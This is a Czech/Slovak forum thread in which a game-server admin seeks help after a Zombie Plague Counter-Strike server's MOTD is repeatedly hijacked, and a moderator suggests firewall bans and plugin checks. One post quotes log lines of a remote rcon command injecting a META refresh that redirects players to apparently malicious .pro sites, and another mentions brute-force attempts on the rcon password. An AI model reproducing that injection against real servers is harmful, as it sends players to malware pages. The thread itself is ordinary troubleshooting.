ZP + virus ?

Message
Autor
Uživatelský avatar
UltIm4t3 Luk1
Příspěvky: 33
Věk: 33
Registrován: 03 bře 2011, 23:46
Reputation: 0
Kontaktovat uživatele:

ZP + virus ?

#1 Příspěvekod UltIm4t3 Luk1 » 22 zář 2012, 23:37

Server: 217.11.249.83:27143

Zdravím,

nedávno som reinštaloval server na zombie plague, použitim Vašich instalacii. niektory z pluginov obsahuje ale kod ktory meni motd.txt kazde kolo na obsah tejto stranky:

http://searchedinfectious.pro/articles/news.php

Ani tam neklikajte, pretoze Vám antivirsuový program vyhodí infekciu :)

Po nahradeni standardnych pluginov (amx zakladu) novymi, rekompilovanymi a tiez rekompilovanym deaglesmapmanazerom, to prestalo. Neviem teda presne ktory plugin to bol kazdopadne by som Vás chcel požiadat aby ste si to overili.

Ďakujem
Obrázek

Obrázek

Uživatelský avatar
Qefik
Příspěvky: 5714
Registrován: 26 pro 2009, 11:26
Reputation: 0
Kontaktovat uživatele:

Re: ZP + virus ?

#2 Příspěvekod Qefik » 23 zář 2012, 09:53

ZP a všechny pluginy co sem tam dával byly přímo z ofic. fóra, ale kouknem se na to.
Rozdávat rady je zbytečné. Moudrý si poradí sám a hlupák stejně neposlechne.
Mark Twain

Uživatelský avatar
UltIm4t3 Luk1
Příspěvky: 33
Věk: 33
Registrován: 03 bře 2011, 23:46
Reputation: 0
Kontaktovat uživatele:

Re: ZP + virus ?

#3 Příspěvekod UltIm4t3 Luk1 » 21 říj 2012, 23:46

Tak problem je asi niekde inde ...

Kód: Vybrat vše

L 10/20/2012 - 21:33:28: Rcon: "rcon 769871625  MOJRCON motd_write <META HTTP-EQUIV=Refresh CONTENT="0 URL=http://rdiofakeavremover.pro/ww/ractlazy.php?ntedapse=824892">" from "178.123.245.121:29416"

L 10/20/2012 - 21:31:51: Rcon: "rcon 769871625  MOJRCON motd_write <META HTTP-EQUIV=Refresh CONTENT="0 URL=http://whiteboardshotelclubcom.pro/nine/history_greatest_real.php">" from "178.123.245.121:29416"
Obrázek

Obrázek

Uživatelský avatar
Qefik
Příspěvky: 5714
Registrován: 26 pro 2009, 11:26
Reputation: 0
Kontaktovat uživatele:

Re: ZP + virus ?

#4 Příspěvekod Qefik » 22 říj 2012, 06:47

zabanuj ve firewallu tu IP odkud to chodí. Případně zkontroluj verze metamodu a dprota. Je také možné že tam máš nějaký plugin, který umožňuje přístup k serveru.
Rozdávat rady je zbytečné. Moudrý si poradí sám a hlupák stejně neposlechne.
Mark Twain

Uživatelský avatar
UltIm4t3 Luk1
Příspěvky: 33
Věk: 33
Registrován: 03 bře 2011, 23:46
Reputation: 0
Kontaktovat uživatele:

Re: ZP + virus ?

#5 Příspěvekod UltIm4t3 Luk1 » 22 říj 2012, 16:26

IP je viac bohuzial a aj na alliedmods tam o tom niekto pisal. Metamod a dproto je z tej Vasej instalacie, skontroloval som velkost s velkostou na inych serveroch a sedi. Pluginy su opat z Vasej instalacie a pluginy ktore som tam pridal su aj na inych serveroch, kde sa nic podobne nedeje.
Obrázek

Obrázek

Uživatelský avatar
Qefik
Příspěvky: 5714
Registrován: 26 pro 2009, 11:26
Reputation: 0
Kontaktovat uživatele:

Re: ZP + virus ?

#6 Příspěvekod Qefik » 22 říj 2012, 20:14

plugins.ini mi sem hoď. Zkoušel si dát jinou verzi ZP? Nebo případně postupně vypínat nedůležité pluginy? Koukni taky do itemů na ZP a zkus je.
Rozdávat rady je zbytečné. Moudrý si poradí sám a hlupák stejně neposlechne.
Mark Twain

Uživatelský avatar
UltIm4t3 Luk1
Příspěvky: 33
Věk: 33
Registrován: 03 bře 2011, 23:46
Reputation: 0
Kontaktovat uživatele:

Re: ZP + virus ?

#7 Příspěvekod UltIm4t3 Luk1 » 24 říj 2012, 18:50

zp mozem skusit dat inu i ked je tam stale ta Vasa. Pluginy su v poriadku co som pozeral pluginy ktore som pridal ja som su zaklad a su takmer vsade a inde problem nie je. Mimoto problem zacal po reinstalacii, teda mozu to byt iba pluginy ktore su v instalacii alebo niekde pri tom. Kedze ak by to bol nejaky hacker, preco by menil iba motd? To nedava zmysel, teda je to nejaky iny problem no momentalne som zmenil rcon a cakam ci sa to vrati.
Obrázek

Obrázek

Uživatelský avatar
Qefik
Příspěvky: 5714
Registrován: 26 pro 2009, 11:26
Reputation: 0
Kontaktovat uživatele:

Re: ZP + virus ?

#8 Příspěvekod Qefik » 24 říj 2012, 18:57

Nikdo jiný s tím problém nemá, ale pořád nemám plugins.ini a dej sem i seznam itemů. Dále bych se rád koukl na debug po startu serveru a uvidím jestli se z toho dá něco vyčíst nebo ne.
Rozdávat rady je zbytečné. Moudrý si poradí sám a hlupák stejně neposlechne.
Mark Twain

Uživatelský avatar
UltIm4t3 Luk1
Příspěvky: 33
Věk: 33
Registrován: 03 bře 2011, 23:46
Reputation: 0
Kontaktovat uživatele:

Re: ZP + virus ?

#9 Příspěvekod UltIm4t3 Luk1 » 25 říj 2012, 13:54

Ten server ani nebol nejak upravovany kedze kvoli tym utokom to ani nema zmysel takze je to tam v podstate standardne, ale ako chces pozri sa sam. Itemy su zakladne a teda zoznam itemov nie je treba. I ked som si v logoch vsimol opakovane utoky cez HLXBrute. Je blbost ako sa to dostalo von kedze ten Brute akurat skusa rozne slova a cisla. Moj rcon je takmer stale zhluk pismen a cislic ktore zmysel nedavaju a tento program ho teda odhlait nemohol. No asi to bol iba nejaky utok ktory im teda vysiel ... netusim. Najlepsie asi ale bude pozriet normal logy, kde sa dane utoky ukazali. No bohuzial logov je vela...
Přílohy
plugins-zplague.ini
(463 bajtů) Staženo 291 x
plugins.ini
(2.04 KiB) Staženo 260 x
Obrázek

Obrázek

Uživatelský avatar
Qefik
Příspěvky: 5714
Registrován: 26 pro 2009, 11:26
Reputation: 0
Kontaktovat uživatele:

Re: ZP + virus ?

#10 Příspěvekod Qefik » 25 říj 2012, 14:38

Co koukám tak je tam hodně pluginů které tam nejsou v základní instalaci... Zkus vypnout všechny které nejsou potřeba pro samotný chod server (xredirect, country_track a jim podobné)
Dále tu stále nemám debug ze startu serveru (pokud nevíš jak zapnout, následuj TENTO ODKAZ, mohlo by tam něco být. A příště stačí dávat výpisy ze souborů
Rozdávat rady je zbytečné. Moudrý si poradí sám a hlupák stejně neposlechne.
Mark Twain


Zpět na „AMX mod X“

Kdo je online

Uživatelé prohlížející si toto fórum: Žádní registrovaní uživatelé a 4 hosti